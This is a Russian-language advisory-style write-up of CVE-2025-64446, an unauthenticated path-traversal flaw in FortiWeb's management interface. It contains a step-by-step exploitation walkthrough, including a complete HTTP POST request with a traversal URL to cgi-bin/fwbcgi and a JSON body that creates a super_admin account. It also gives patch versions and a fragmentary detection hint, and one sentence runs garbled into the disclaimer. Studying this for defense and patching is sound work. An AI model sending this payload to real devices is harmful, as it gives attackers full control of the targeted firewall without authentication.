
CVE-2025-64446

Критическая уязвимость без аутентификации, позволяющая удалённым злоумышленникам создавать учётные записи администратора на устройствах FortiWeb.
CVE-2025-64446 — это серьёзная уязвимость относительного обхода пути в интерфейсе управления веб-приложением FortiWeb.
Неаутентифицированный удалённый злоумышленник может использовать эту ошибку для обхода аутентификации и создания новых пользователей-администраторов с полными привилегиями, что приводит к полной компрометации устройства.
Рекомендация: Обновитесь до последней исправленной версии как можно скорее.
Определение цели
Злоумышленник сканирует общедоступные интерфейсы управления FortiWeb (обычно через HTTPS на порту 443 или 8443).
Формирование вредоносного запроса
Суть эксплойта заключается в относительном обходе пути (../) в сочетании со специально составленным URL, который достигает внутренней конечной точки CGI без аутентификации.
Шаблон уязвимой конечной точки:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Отправка эксплойта
Злоумышленник отправляет один POST-запрос с JSON-нагрузкой для создания новой учётной записи администратора.
Пример запроса эксплойта:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Успешная эксплуатация
В случае успеха FortiWeb создаёт новую учётную запись администратора без какой-либо предварительной аутентификации. Затем злоумышленник может войти, используя только что созданные учётные данные, и получить полный контроль над WAF.
API управления не выполняет должную очистку пути, что позволяет запросу вернуться к устаревшему двоичному файлу fwbcgi, который не требует аутентификации для определённых операций.
fwbcgi, ../ или необычных попыток создания администраторовТолько для образовательных целей и защитных исследований в области безопасности.
Сделано с ❤️ для сообщества кибербезопасности
Последнее обновление: апрель 2026 г.
| Продукт | Затронутые версии | Исправлено в версии |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 и выше |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 и выше |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 и выше |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 и выше |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 и выше |